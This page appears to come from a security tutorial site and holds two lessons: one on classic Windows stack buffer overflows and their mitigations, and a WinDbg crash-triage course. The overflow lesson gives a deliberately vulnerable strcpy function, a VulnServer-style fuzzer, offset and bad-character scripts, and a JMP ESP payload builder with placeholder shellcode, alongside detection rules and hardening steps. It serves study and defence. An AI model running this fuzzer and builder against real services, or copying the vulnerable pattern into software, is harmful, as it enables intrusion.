- Position-Independent Code: Writing PIC Shellcode Without Hardcoded Addresses
- Writing x64 Shellcode: Differences, Shadow Space, and Register Conventions
- Writing Your First Shellcode: x86 Reverse Shell from Scratch
- Bad Characters, Null Bytes, and Restricted Character Sets
- Egghunters: Staged Payload Delivery When Buffer Space Is Tight
References
- Obfuscated Files or Information, Technique T1027 – Enterprise | MITRE ATT&CK®
- Obfuscated Files or Information: Encrypted/Encoded File, Sub-technique T1027.013 – Enterprise | MITRE ATT&CK®
- Exploit Writing Tutorial Part 9: Introduction to Win32 Shellcoding | Corelan Cybersecurity Research
- How to Use msfvenom (Bad Chars & Encoders) | Metasploit Documentation – Offensive Security
- MSFencode – Encoding Shellcode to Remove Bad Characters | Metasploit Unleashed – Offensive Security
- Encapsulating Antivirus (AV) Evasion Techniques in Metasploit Framework | Rapid7 Whitepaper
Classic Stack Buffer Overflow: Smashing the Stack on Windows
Objective: Understand how a classic stack-based buffer overflow corrupts a Windows x86 call frame, hijacks the saved
EIP, and redirects execution through aJMP ESPtrampoline — and how/GS, SafeSEH, SEHOP, DEP, and ASLR defeat or complicate it, so you can detect and defend against this vulnerability class in authorized lab work.
1. Windows Memory Layout Primer
Every Windows process runs inside a private virtual address space. On x86 (32-bit), that space spans 0x00000000–0x7FFFFFFF for user mode. The stack grows downward (high to low addresses) and stores function call frames; the heap grows upward and serves dynamic allocations.
The CPU tracks two stack-relevant registers and one execution register:
ESP— stack pointer, the current top of stack.EBP— base/frame pointer, anchors the current frame.EIP— instruction pointer, the address of the next instruction. This is the attacker’s target.
A CALL instruction pushes the return address (the next EIP) onto the stack and jumps to the target. The matching RET pops that saved address back into EIP. If an attacker overwrites the saved return address on the stack, RET transfers control wherever they choose.
x86 is little-endian: the address 0x625011AF is written in the payload as the byte sequence \xAF\x11\x50\x62. This byte ordering matters for every address you place into an exploit buffer.
2. Anatomy of a Stack Frame
A standard cdecl/stdcall function frame is built by the prologue and torn down by the epilogue. Laid out high → low address:
| Stack Slot | Description |
|---|---|
| Function arguments | Pushed by caller before CALL |
Saved EIP (return address) | Pushed implicitly by the CALL instruction |
Saved EBP | Pushed by callee prologue (PUSH EBP) |
/GS stack cookie (if present) | Inserted between locals and saved EBP/EIP |
| Local variables / buffers | Allocated by SUB ESP, N |
← ESP (stack top) | Grows downward |
The prologue and epilogue, with the /GS cookie check shown, look like this:
; --- Prologue ---
push ebp ; save caller frame pointer
mov ebp, esp ; establish new frame
sub esp, 0x40 ; allocate 64 bytes of locals
mov eax, [__security_cookie]
xor eax, ebp ; cookie ^= EBP (frame-tied canary)
mov [ebp-4], eax ; store cookie above locals
; --- Epilogue ---
mov ecx, [ebp-4]
xor ecx, ebp
call __security_check_cookie ; compare vs master; abort on mismatch
mov esp, ebp
pop ebp ; restore caller frame pointer
ret ; pop saved EIP into instruction pointerReading this frame live in WinDbg or x64dbg — inspecting ESP, EBP, and the bytes between locals and the saved return address — is the first skill of exploit development.

3. The Overflow: Why Bounds Checks Matter
The root cause is always the same: a copy operation that writes more bytes into a fixed-size stack buffer than the buffer holds. The classic offenders are CRT functions that perform no bounds checking.
| Identifier | What it does |
|---|---|
strcpy, strcat, gets, sprintf, scanf | Unsafe CRT functions with no bounds checking — classic root causes |
memcpy(dst, src, count) | Copies count bytes regardless of dst size; dangerous when count is attacker-controlled |
Here is the canonical vulnerable pattern defenders must recognize in code review:
#include <string.h>
// DELIBERATELY VULNERABLE — lab use only.
void handle_request(char *attacker_input) {
char buffer[64]; // fixed 64-byte stack buffer
strcpy(buffer, attacker_input); // no length check — overflow
}When attacker_input exceeds 64 bytes, the copy walks past buffer, overwrites the saved EBP, then the saved EIP. Supply a long run of 0x41 ('A') and the program crashes with an access violation as the CPU tries to execute at EIP = 0x41414141. That controlled crash is proof you own the instruction pointer.
When compiled with MSVC /GS- (cookie disabled), the prologue omits the xor/store and the epilogue omits __security_check_cookie entirely — a linear overflow reaches the return address unobstructed. Diffing the /GS vs /GS- disassembly in a debugger is the clearest way to see the cookie.
4. Exploit Development Methodology on Windows
The classic workflow is a tight loop against an intentionally vulnerable target in an isolated VM:
- Fuzz to crash — send increasing-length inputs until the service faults.
- Find the offset — send a cyclic (de Bruijn) pattern, read the value in
EIPat crash, compute the exact distance to the return address. - Confirm EIP control — overwrite with a known marker (
0x42424242) and verify. - Enumerate bad characters — find bytes the protocol mangles (
\x00,\x0a,\x0dare common). - Find a trampoline — locate
JMP ESPin a non-ASLR module. - Build the payload — padding + trampoline address + NOP sled + shellcode.
A minimal network fuzzer:
import socket, time
target = ("192.168.56.20", 9999)
size = 100
while size < 4000:
try:
s = socket.socket()
s.connect(target)
buf = b"TRUN /.:/" + b"A" * size # protocol prefix + payload
s.send(buf)
s.close()
print(f"[+] sent {size} bytes")
size += 200
time.sleep(1)
except Exception:
print(f"[!] crashed at ~{size} bytes")
breakOffset discovery with a cyclic pattern (generated by pwntools or !mona pattern_create):
from pwn import cyclic, cyclic_find
pattern = cyclic(3000) # de Bruijn sequence
# ... send pattern, read EIP from the debugger at crash (e.g. 0x6f43396e) ...
offset = cyclic_find(0x6f43396e) # exact bytes before saved EIP
print(f"[+] EIP offset = {offset}")Bad-character enumeration sends the full byte range and diffs it against memory:
badchar_test = bytes(b for b in range(1, 256)) # skip \x00 first
# Send, then in the debugger: d esp -> compare bytes in memory
# Any byte missing/truncated is a bad char; rebuild excluding it.The final builder assembles the pieces. Note the placeholder shellcode — generate benign calc-popping shellcode with msfvenom in your own lab; never embed working shellcode in a tutorial:
from pwn import p32
offset = 2003
jmp_esp = 0x625011AF # FF E4 in a non-ASLR module
nop_sled = b"\x90" * 16
# shellcode = b"[MSFVENOM_OUTPUT_HERE]" # generated in your lab, -b "\x00\x0a\x0d"
shellcode = b"\x90" * 32 # placeholder
payload = b"A" * offset + p32(jmp_esp) + nop_sled + shellcodeThe key opcodes you search modules for:
| Opcode bytes | Instruction | Use |
|---|---|---|
FF E4 | JMP ESP | Classic return trampoline |
FF D4 | CALL ESP | Equivalent effect |
FF E5 | JMP EBP | When EBP points near the buffer |
EB 06 | Short JMP +6 | Next-SEH jump-over gadget |
Because ESP points at the attacker’s buffer when RET executes, returning into JMP ESP immediately pivots execution into the NOP sled and shellcode.

5. Windows Mitigations Deep-Dive
Modern Windows defaults make the naïve attack above fail. Each mitigation targets a different stage.
| Mitigation | Mechanism | Bypass vector (teaching) |
|---|---|---|
/GS (stack cookie) | Random DWORD cookie between locals and saved EBP/EIP; checked in epilogue | SEH overwrite before the cookie check; cookie leak |
| SafeSEH | PE table of valid SEH handlers; loader validates the handler before dispatch | Trampoline in a module not compiled /SAFESEH |
| SEHOP | Validates the SEH chain reaches FinalExceptionHandler at dispatch | Chain spoofing; non-opted-in modules |
DEP/NX (/NXCOMPAT) | Pages are W^X; the stack is non-executable | ROP chain (follow-on topic) |
ASLR (/DYNAMICBASE) | Randomizes image/stack/heap base | Partial overwrites, info leaks (follow-on topic) |
/GS computes a program-wide master cookie at startup via __security_init_cookie(), stored in the module’s .data section. The prologue copies it onto the stack between the locals and the saved frame pointer; the epilogue runs __security_check_cookie(), which calls __report_gsfailure() on mismatch. Microsoft shipped /GS in Visual Studio 2003 and enabled it by default in 2005. Variable reordering moves arrays and structs to the highest part of the frame so a linear overflow cannot clobber other locals before reaching the cookie.
The original /GS only protected arrays of 8+ elements with element size 1 or 2; the later GS++ expanded coverage to any array and any struct regardless of size. The critical limitation: /GS does not protect exception handler records. DEP and ASLR are not stack-specific — they do not stop the overflow or the EIP hijack; they make running shellcode far harder.

6. SEH-Based Overflow (x86)
On x86, Structured Exception Handling chains live on the stack as linked EXCEPTION_REGISTRATION_RECORD nodes:
typedef struct _EXCEPTION_REGISTRATION_RECORD {
struct _EXCEPTION_REGISTRATION_RECORD *Next; // next handler in chain
PEXCEPTION_ROUTINE Handler; // SE handler function ptr
} EXCEPTION_REGISTRATION_RECORD, *PEXCEPTION_REGISTRATION_RECORD;When a function uses try/except, this record sits on the stack beside the /GS cookie. If the attacker overflows far enough to overwrite both Next SEH and SE Handler, then triggers an exception before the epilogue runs __security_check_cookie(), the OS dispatches to the attacker-controlled handler — bypassing the cookie entirely.
The standard technique overwrites SE Handler with the address of a POP–POP–RET gadget inside a loaded module. At dispatch, the stack arrangement places a pointer to the Next SEH field where RET lands; POP–POP–RET unwinds two slots and returns into the attacker’s Next SEH value, which is typically a short jump (EB 06) over the handler bytes into the shellcode.
SafeSEH breaks this by validating the handler against the PE’s registered-handler table; attackers respond by sourcing the gadget from a module not built with /SAFESEH. SEHOP (default since Vista SP1) walks the chain to confirm it terminates at FinalExceptionHandler, defeating a naively overwritten chain. On 64-bit, exception data is table-based and no longer stored on the stack, so this primitive does not apply.

7. Lab Walkthrough: Exploiting an Intentionally Vulnerable Binary
Perform every step against a purpose-built target — VulnServer, brainpan, or a custom binary compiled with /GS- — inside an isolated VM with no network access to production. The two-phase approach makes the mitigations tangible:
- No-protections build: Compile with
/GS-/NXCOMPAT:NO/DYNAMICBASE:NO. Run the fuzzer (§4), crash the service, find the offset with a cyclic pattern, confirmEIPcontrol, enumerate bad chars, locateJMP ESPwithmona.py, and land in a NOP sled. /GS-only build: Recompile with/GSenabled, replay the same payload, and watch__security_check_cookiedetect the corrupted canary and terminate the process via__report_gsfailure()— the same input that worked now dies in the epilogue.
Reference debugger and mona.py commands:
0:000> g ; run until crash
0:000> r ; read registers — expect EIP = 41414141
0:000> d esp ; dump stack at ESP — find your buffer
0:000> !exploitable ; triage the crash classification
0:000> bp 0x625011AF ; break on the JMP ESP trampoline!mona findmsp ; locate cyclic pattern, report EIP offset
!mona jmp -r esp -cpb "\x00\x0a\x0d" ; find JMP ESP excluding bad chars
!mona bytearray -cpb "\x00" ; generate byte array for badchar diffing8. Common Attacker Techniques
| Technique | Description |
|---|---|
| Linear stack smash | Overflow a buffer to overwrite saved EIP with a JMP ESP trampoline |
| SEH overwrite | Overwrite Next SEH + SE Handler, trigger an exception to bypass /GS |
| Non-SafeSEH trampoline | Source POP–POP–RET / JMP ESP gadgets from modules lacking /SAFESEH |
| Bad-char-safe encoding | Encode shellcode to avoid protocol-mangled bytes (\x00, \x0a, \x0d) |
| Egghunter / staging | Use a small first-stage to locate or download a larger payload |
Post-exploit VirtualProtect | Mark injected memory executable to evade software DEP in legacy scenarios |
In practice the attacker chains these: a SEH overwrite defeats the cookie, a non-SafeSEH gadget defeats SafeSEH, and a ROP stub built from non-ASLR module gadgets defeats DEP before transferring to shellcode.
9. Defensive Strategies & Detection
Sysmon does not emit a “buffer overflow” event. The crash surfaces through Windows Error Reporting, and the post-exploitation behavior surfaces through Sysmon.
- WER Event ID 1000 (
Application Error,Applicationlog) — logs the faulting module,ExceptionCode = 0xC0000005(access violation), faulting offset, and thread ID. A0xC0000005at a non-canonical offset in a network-facing service is high-fidelity. - WER Event ID 1001 — records the crash bucket and any captured dump.
Relevant Sysmon events for follow-on activity:
| Event ID | Name | Relevance |
|---|---|---|
1 | Process Creation | Shells/payloads spawned from a crashed service |
3 | Network Connection | Reverse-shell / C2 egress from shellcode |
7 | Image Loaded | Unexpected ws2_32.dll load by a non-network service |
8 | CreateRemoteThread | Thread injection by shellcode |
10 | Process Access | Shellcode calling OpenProcess on lsass.exe |
11 | File Created | Dropped payloads / second-stage binaries |
25 | Process Tampering | Process hollowing following the overflow |
Useful ETW providers: Microsoft-Windows-WER-Diag (crash diagnostics), Microsoft-Windows-Security-Mitigations (WDEG/Exploit Guard triggers, in /KernelMode and /UserMode channels), and Microsoft-Windows-Kernel-Process. Enable Audit Process Creation (4688) with command-line logging and Audit Process Termination (4689) to catch crash/restart loops.
A conceptual Sigma rule keying on repeated crashes of a network-facing service:
title: Repeated Application Crash on Network-Facing Service
logsource:
product: windows
service: application
detection:
selection:
EventID: 1000
Application|contains: 'vulnservice.exe'
ExceptionCode: '0xc0000005'
condition: selection | count() > 3 by Application within 1m
falsepositives:
- Legitimate software bugs
level: medium
tags:
- attack.initial_access
- attack.T1190Hardening Steps
- Force WDEG / Exploit Protection on network-facing services — mandatory DEP, force-ASLR, SEHOP, heap-spray protection via
Set-ProcessMitigation. - Build with
/GS,/SAFESEH,/DYNAMICBASE,/NXCOMPATand audit your pipeline for them. - Verify SEHOP —
HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\kernel\DisableExceptionChainValidation = 0. - Forward WER Event ID 1000 to the SIEM and alert on repeated crashes of one process.
- Use AddressSanitizer (
/fsanitize=address, MSVC ≥ VS 2019 16.9) in dev/test to catch OOB writes. - Rate-limit oversized inputs at the WAF/NGFW; alert on crash surges.
- Run services least-privilege so successful exploitation yields minimal access.
10. Tools for Stack Overflow Analysis
| Tool | Description | Link |
|---|---|---|
| WinDbg | Kernel/user debugger; !exploitable crash triage | microsoft.com |
| x64dbg | User-mode debugger for live frame inspection | x64dbg.com |
| mona.py | Immunity/WinDbg plugin for offsets, trampolines, bad chars | github.com |
| pwntools | Python exploit-dev framework (cyclic, p32) | pwntools.com |
| ROPgadget | Gadget discovery for DEP-bypass chains | github.com |
| Ghidra | Static disassembly / decompilation for code review | ghidra-sre.org |
| Sysmon | Endpoint telemetry for post-exploitation behavior | microsoft.com |
11. MITRE ATT&CK Mapping
| Technique | MITRE ID | Detection |
|---|---|---|
| Exploit Public-Facing Application | T1190 | WER EventID 1000 crash bursts; WAF oversized-input alerts |
| Exploitation for Privilege Escalation | T1068 | Service running as SYSTEM crashing then spawning children |
| Exploitation for Client Execution | T1203 | Client app (parser/player) crash + child process via Sysmon EventID 1 |
| Endpoint DoS: Application Exploitation | T1499.004 | Repeated crash/restart loops (4689, WER 1000) |
| Exploit Protection (mitigation) | M1050 | DEP/ASLR/SEHOP//GS enforced via WDEG telemetry |
Stack buffer overflow is a vulnerability primitive, not a standalone ATT&CK technique. T1190 and T1068 are the canonical mappings for the adversarial behavior that uses it.
Summary
- A classic stack buffer overflow overwrites the saved return address to hijack
EIPand pivot execution into attacker-controlled shellcode via aJMP ESPtrampoline. - The x86 frame places locals, an optional
/GScookie, savedEBP, and the returnEIPin a predictable order that linear overwrites exploit. /GSinserts a stack canary checked in the epilogue, but does not protect SEH records — the SEH overwrite is the canonical x86 bypass, in turn countered by SafeSEH and SEHOP.- DEP and ASLR do not stop the overflow itself; they force ROP and info-leak techniques to run shellcode.
- Detect via WER
Event ID 1000(0xC0000005) crash bursts plus Sysmon post-exploitation events, and harden with WDEG,/GS/SAFESEH/DYNAMICBASE/NXCOMPAT, SEHOP, and least privilege.
Related Tutorials
- Egghunters: Staged Payload Delivery When Buffer Space Is Tight
- Understanding the Stack: Frames, Prologue/Epilogue, and Stack Layout
- Shellcode Encoders: XOR Encoding, Custom Decoders, and Avoiding Bad Chars
- Position-Independent Code: Writing PIC Shellcode Without Hardcoded Addresses
- Writing x64 Shellcode: Differences, Shadow Space, and Register Conventions
References
- Exploitation for Privilege Escalation, Technique T1068 – Enterprise | MITRE ATT&CK
- Exploit Public-Facing Application, Technique T1190 – Enterprise | MITRE ATT&CK
- /GS (Buffer Security Check) | Microsoft Learn
- Visual C++ Support for Stack-Based Buffer Protection | Microsoft Learn (MSDN Magazine)
- Security Briefs: Protecting Your Code with Visual C++ Defenses | Microsoft Learn
- Security Features in Microsoft Visual C++ | Microsoft C++ Team Blog
WinDbg Crash Course: Navigation, Commands, and Workflow for Exploit Devs
Objective: Learn to drive WinDbg against a crashing Windows target — configure symbols, attach in all three modes, read a fault from first principles, master every breakpoint type, inspect the heap, and use the
dxdata model and Time Travel Debugging — so you can triage crashes and build the workflow exploitation labs depend on.
1. WinDbg Classic vs. WinDbg Preview — Choosing Your Tool
Two editions share the same dbgeng.dll engine but differ in shell and capabilities.
| Feature | WinDbg Classic | WinDbg Preview (WinDbgX) |
|---|---|---|
| Distribution | Windows SDK / WDK | Microsoft Store (UWP) |
| Layout model | Workspace .wsp files | Modern ribbon UI |
| Time Travel Debugging | No | Yes |
| Underlying engine | dbgeng.dll | dbgeng.dll |
Use WinDbg Preview as your daily driver — the ribbon, source overlay, and Time Travel Debugging (TTD) make crash triage faster. Keep Classic available for headless scripting on stripped-down lab VMs where the Store runtime is unavailable. Kernel debugging over serial/network (bcdedit /debug on) is a separate discipline; this tutorial stays user-mode.
2. Symbol Configuration Done Right
Without symbols, every other command degrades to raw addresses. A PDB (.pdb) file maps human-readable source elements — function names, struct layouts, locals — to addresses in the compiled binary. Symbols are generated at build/link time.
Set the symbol path before you launch via the _NT_SYMBOL_PATH environment variable, or in-session with .sympath.
0:000> .sympath cache*C:\Symbols;srv*https://msdl.microsoft.com/download/symbols
0:000> .reload /f
0:000> lm.reload loads symbols lazily; .reload /f forces immediate load. When a module shows (deferred) or (export symbols) in lm, symbol resolution failed. Diagnose with !sym noisy, which prints every path the loader probes, then silence it with !sym quiet.
| Command | Purpose |
|---|---|
.sympath | Display / set / append the symbol path |
.reload /f | Force immediate symbol load |
!sym noisy | Verbose symbol-loader trace |
lm | List modules and symbol-load state |
x module!pattern | Resolve a symbol name to an address |
ln address | Find the nearest named symbol to an address |
3. Attaching to a Target: Three Modes
| Mode | How | Use case |
|---|---|---|
| Launch | windbg.exe target.exe | Debug from process start |
| Attach | windbg.exe -p <PID> | Inspect a running process |
| Open dump | windbg.exe -z crash.dmp | Post-mortem analysis |
On launch and attach the debugger stops at an initial break before user code runs. The exception model is two-stage: the debugger sees a first-chance exception first, and only if the target’s own handlers do not resolve it does the second-chance exception fire. Control which exceptions break execution with sxe (enable / break), sxd (disable), and sxi (ignore).
0:000> sxe av ; break on first-chance access violations
0:000> sxe ld:user32 ; break when user32 loads
0:000> gThe sxe ld / g idiom is the canonical way to break exactly when a target module maps into the address space — essential for setting breakpoints on code that is not yet present.

4. The Essential Command Vocabulary
Execution control, register/stack inspection, and memory display form the core loop.
| Command | What it does |
|---|---|
g (F5) | Continue execution of the debuggee |
p / t | Step over / step into |
gu | Execute until the current function returns |
pt / wt | Step to next ret / trace-and-watch a call tree |
r | Display all general-purpose registers |
k / kb / kp | Stack trace; kb adds first 3 args; kp adds typed parameters |
lm / u / uf | List modules / disassemble / disassemble full function |
Memory display and edit commands follow a consistent type-suffix grammar:
| Command | What it does |
|---|---|
db / dw / dd / dq | Display bytes / words / DWORDs / QWORDs |
da / du | Display ASCII / Unicode string |
dp / dv | Display pointer-sized values / local variables |
dt module!Type [addr] | Dump a typed struct (e.g. dt ntdll!_PEB @$peb) |
!peb / !teb | Dump the Process / Thread Environment Block |
eb / ew / ed / eq | Edit byte / word / DWORD / QWORD |
ea / eu | Write ASCII / Unicode characters to an address |
s -d start end value | Search memory for a pattern over a range |
!address | Show virtual mapping, permissions, and region type |
A typical inspection sequence at a fault reads registers, walks the stack, then dumps memory at the stack pointer:
0:000> r
0:000> k
0:000> dd esp L8
0:000> dt ntdll!_EXCEPTION_RECORD @$exr5. Crash Triage: Reading a Fault from First Principles
When a target faults, the debugger lands on the faulting instruction with an exception record describing the cause. !analyze -v automates first-pass triage, emitting the faulting IP, the decoded exception, the stack, and a probable root cause.
0:000> !analyze -v
FAULTING_IP:
vuln!process_packet+0x4a
0040124a 8801 mov byte ptr [ecx],al
EXCEPTION_RECORD: (.exr -1)
ExceptionCode: c0000005 (Access violation)
ExceptionAddress: 0040124a
EXCEPTION_PARAMETER[1]: 41414141 ; attacker-controlled write target
STACK_TEXT:
0019f7c0 41414141 41414141 41414141 vuln!process_packet+0x4aRead it methodically: FAULTING_IP is the instruction that trapped; the [ecx] write target of 41414141 (“AAAA”) signals attacker-controlled memory. A corrupted STACK_TEXT full of 41414141 indicates a saved-return-address overwrite. Decode any NTSTATUS with !error 0xC0000005. The MSEC !exploitable extension applies heuristics to estimate exploitability classification — load it with .load msec.dll first.
For Structured Exception Handler overwrites, !exchain walks the handler chain:
0:000> !exchain
0019ffdc: 41414141 ; handler overwritten with attacker bytes
Invalid exception stack at 41414141A handler pointer of 41414141 confirms an SEH overwrite primitive.

6. Breakpoint Mastery
WinDbg distinguishes software breakpoints (bp, patch an int 3) from hardware breakpoints (ba, debug registers — they trap reads/writes/executes without modifying code).
| Command | What it does |
|---|---|
bp module!func | Software breakpoint, resolved immediately |
bu module!func | Unresolved — arms when the module loads |
bm module!pattern* | Breakpoint on all symbols matching a pattern |
ba r4 addr | Hardware breakpoint: read 4 bytes (ba e1 = execute, ba w4 = write) |
bp /1 addr | One-shot breakpoint, auto-clears after firing |
bl / bd N / be N / bc * | List / disable / enable / clear all breakpoints |
Attach a command string that runs automatically on each break, chaining with ;:
0:000> bu kernel32!WriteFile "k; r eax; g"
0:000> ba w4 0019f7c0 "!address @rip; g"Use hit-count throttling to avoid output floods on hot paths, and dx query expressions for true conditional breakpoints:
0:000> bp /5 `vuln!net.c:385` "!teb; k; g"
0:000> bp /w "dx ((int)@ecx) == 0x41414141" vuln!process_packetThe bp /w form breaks only when the expression evaluates true — far cheaper than breaking and manually re-continuing.
7. Heap Internals Inspection
Heap corruption — use-after-free, overflow into adjacent chunks — is where most modern exploitation lives. The !heap extension family exposes chunk headers and allocation state.
| Command | What it does |
|---|---|
!heap -s | Summary of all heaps |
!heap -flt s 0x80 | Show all allocations of size 0x80 |
!heap -p -all | Walk all allocations in all heaps |
!heap -l | Detect leaked heap blocks |
0:000> !heap -s
0:000> !heap -flt s 0x80 ; isolate chunks of a target size class
0:000> !heap -p -all ; correlate chunks to allocation call sitesFiltering by size class isolates the chunks an attacker grooms; !heap -p -all ties each block back to its allocation stack, which is how you identify the object straddling a corrupted boundary.
8. The dx Data Model and Scripting
The dx (Debugger Object Model) command exposes debugger state as queryable objects with a LINQ-style syntax — ideal for filtering large outputs and building conditions.
0:000> dx @$curprocess.Modules
0:000> dx @$curthread.Stack.Frames.Select(f => f.Attributes.InstructionOffset)
0:000> dx Debugger.Utility.Control.ExecuteCommand("k")Debugger.Utility.Control.ExecuteCommand runs any legacy command from inside a dx query, enabling hybrid scripts that mix object queries with classic extensions. Load JavaScript automation with .scriptload script.js and invoke it with .scriptrun.
9. Time Travel Debugging for Exploit Devs
TTD records a full execution trace you can replay forward and backward, then query as data. It is the single biggest accelerator for root-causing memory corruption, because you can step backward from the crash to the write that caused it. WinDbgX must run as Administrator, and TTD is user-mode only in the current public build.
Recording produces a .run trace file. Open it and navigate with the reverse-execution commands:
| Command | What it does |
|---|---|
!tt 0:0 | Jump to a trace position (here, rewind to start) |
g- / p- / t- | Reverse continue / step / trace |
dx @$cursession.TTD.Calls("module!func") | Query every call to a function across the trace |
0:000> !tt 0:0
0:000> dx @$cursession.TTD.Calls("ntdll!RtlAllocateHeap")
0:000> g- ; reverse-continue to the write that preceded the corruptionThe workflow for a heap-corruption case: record to crash, query RtlAllocateHeap/RtlFreeHeap calls to find the freed chunk, set a write watchpoint on it, and g- backward to the exact instruction that wrote out of bounds.

10. Automation and Crash Triage Pipelines
For fuzzer integration, drive WinDbg headlessly with -c startup commands and -logo logging. A minimal triage script:
sxe av; g; !analyze -v; .logclose; qWrap it from any orchestrator:
import subprocess, re
cmds = 'sxe av; g; !analyze -v; .logclose; q'
subprocess.run(['windbg.exe', '-c', cmds, '-logo', 'out.txt', 'target.exe'])
log = open('out.txt', encoding='utf-8', errors='ignore').read()
m = re.search(r'FAULTING_IP:\s*\n(.+)', log)
print('Fault:', m.group(1).strip() if m else 'no crash').logopen / .logclose tee session output to disk for later parsing, turning every fuzzer crash into a structured triage record.
11. Common Attacker Techniques
WinDbg is a defensive and authorized-testing tool, but the APIs it relies on overlap heavily with adversary tradecraft — which is precisely why studying it teaches you the telemetry attackers generate.
| Technique | Description |
|---|---|
| Process attach | OpenProcess(PROCESS_ALL_ACCESS) + DebugActiveProcess mirror injection-stager behavior |
| Memory read/write | ReadProcessMemory / WriteProcessMemory underpin both debugging and code patching |
| Module enumeration | lm, !peb, !teb mirror malware’s runtime module/OS reconnaissance |
| Exploitability triage | !analyze -v, !exploitable, !exchain are used to weaponize crashes |
| TTD trace harvesting | .run files capture sensitive in-memory data during analysis |
An attacker reading LSASS or another process under the same primitives that WinDbg uses generates near-identical handle and memory-access telemetry — so the defender who understands WinDbg understands the indicators.
12. Defensive Strategies & Detection
Debugger activity is observable through process-creation, handle-access, and named-pipe telemetry.
| Sysmon Event ID | Relevance |
|---|---|
| Event ID 1 (Process Create) | windbg.exe / windbgx.exe launch; command line reveals -p PID attach or -z dump |
| Event ID 10 (ProcessAccess) | Attach yields OpenProcess with GrantedAccess: 0x1fffff; SourceImage is windbg.exe |
| Event ID 8 (CreateRemoteThread) | Debugger-injection / anti-anti-debug patterns |
| Event ID 17/18 (Pipe Create/Connect) | Kernel debugging over \\.\pipe\... |
Behavioral indicators for blue teams: windbg.exe -p <PID> on the command line (live attach), presence of dbgsrv.exe / ntsd.exe (remote/headless debug server), msec.dll loaded into a session (active exploitability assessment), and .run TTD trace files written to disk.
A Sigma rule for full-access process attach by a debugger:
title: Debugger Full-Access Attach to Process
logsource:
product: windows
service: sysmon
detection:
selection:
EventID: 10
SourceImage|endswith:
- '\windbg.exe'
- '\windbgx.exe'
GrantedAccess: '0x1fffff'
condition: selection
level: mediumPair Sysmon with the Microsoft-Windows-Kernel-Process ETW provider and Security Event 4688 (enable Audit Process Creation with command-line capture). Restrict SeDebugPrivilege on production hosts so non-admins cannot attach to other users’ or SYSTEM processes, and never expose kernel-debug ports on networked machines.
MITRE ATT&CK Mapping
| Technique | MITRE ID | Detection |
|---|---|---|
| Native API | T1106 | EDR hooks on OpenProcess / ReadProcessMemory |
| Process Injection | T1055 | Sysmon Event ID 10, GrantedAccess masks |
| Process Injection: DLL Injection | T1055.001 | LdrLoadDll / .load activity in traces |
| Debugger Evasion | T1622 | IsDebuggerPresent / heap-flag / timing probes |
| OS Credential Dumping | T1003 | Handle access to lsass.exe (authorized DFIR only) |
| System Information Discovery | T1082 | !peb / !teb / lm-equivalent runtime recon |
13. Tools for WinDbg Analysis
| Tool | Description | Link |
|---|---|---|
| WinDbg Preview | Modern debugger with TTD | microsoft.com |
| WinDbg Classic | SDK/WDK debugger for headless scripting | microsoft.com |
| Process Hacker | Live handle / memory inspection | processhacker.sourceforge.io |
| Process Monitor | File / registry / process tracing | live.sysinternals.com |
| x64dbg | User-mode disassembler-debugger | x64dbg.com |
| Ghidra | Static reverse engineering | ghidra-sre.org |
| Volatility | Memory-forensics framework | volatilityfoundation.org |
msec.dll (!exploitable) | Heuristic exploitability triage | MSEC release |
14. Summary
- WinDbg is the exploit developer’s primary lens into a faulting Windows process — and mastering it means mastering the telemetry attackers generate.
- Correct symbol configuration (
.sympath,.reload /f,!sym noisy) is the prerequisite that makes every other command meaningful. !analyze -v,!exchain, and!heapturn a raw access violation into a root-caused, classified crash;dxqueries and TTD let you step backward to the exact corrupting write.- Master all breakpoint types —
bp,bu,bm, hardwareba, one-shot/1, command anddx-conditional breaks — to control execution precisely. - Detect debugger and attach activity via Sysmon Event ID 1 and 10 (
GrantedAccess: 0x1fffff), Event 4688 command-line auditing, and restrictedSeDebugPrivilegeon production hosts.
Related Tutorials
- Setting Up Your Exploit Development Lab (VMs, Debuggers, Tools)
- What is Exploit Development?
- Egghunters: Staged Payload Delivery When Buffer Space Is Tight
- Shellcode Encoders: XOR Encoding, Custom Decoders, and Avoiding Bad Chars
- Position-Independent Code: Writing PIC Shellcode Without Hardcoded Addresses
References
- Get Started with WinDbg User-Mode Debugger – Microsoft Learn
- Using Debugger Commands (WinDbg) – Microsoft Learn
- bp, bu, bm (Set Breakpoint) – Microsoft Learn
- Processor Breakpoints (ba Breakpoints) – Microsoft Learn
- MITRE ATT&CK T1587.004 – Develop Capabilities: Exploits
- Debugging – WinDBG & WinDBGX Fundamentals – Corelan Exploit Development & Vulnerability Research